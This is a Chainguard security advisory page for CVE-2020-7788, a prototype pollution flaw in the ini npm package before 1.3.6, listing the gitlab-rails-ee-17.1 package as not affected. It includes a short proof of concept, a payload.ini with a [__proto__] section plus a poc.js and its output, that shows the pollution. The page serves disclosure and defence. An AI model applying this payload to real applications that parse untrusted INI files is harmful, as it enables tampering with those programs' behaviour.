DirectorySecurity Advisories
Sign In
Security Advisories

CGA-gf5w-3rv9-3r7h

Published

Last updated

https://images.chainguard.dev/security/CGA-gf5w-3rv9-3r7h
Package

gitlab-rails-ee-17.1

Latest Update
Not affected
Aliases
  • CVE-2020-7788
  • GHSA-qqgx-2p2h-9c37

Severity

7.3

High

CVSS V3

Summary

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Description

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

References

Updates


Safe Source for Open Sourceâ„¢
Media KitContact Us
© 2024 Chainguard. All Rights Reserved.
Private PolicyTerms of Use

Product

Chainguard Images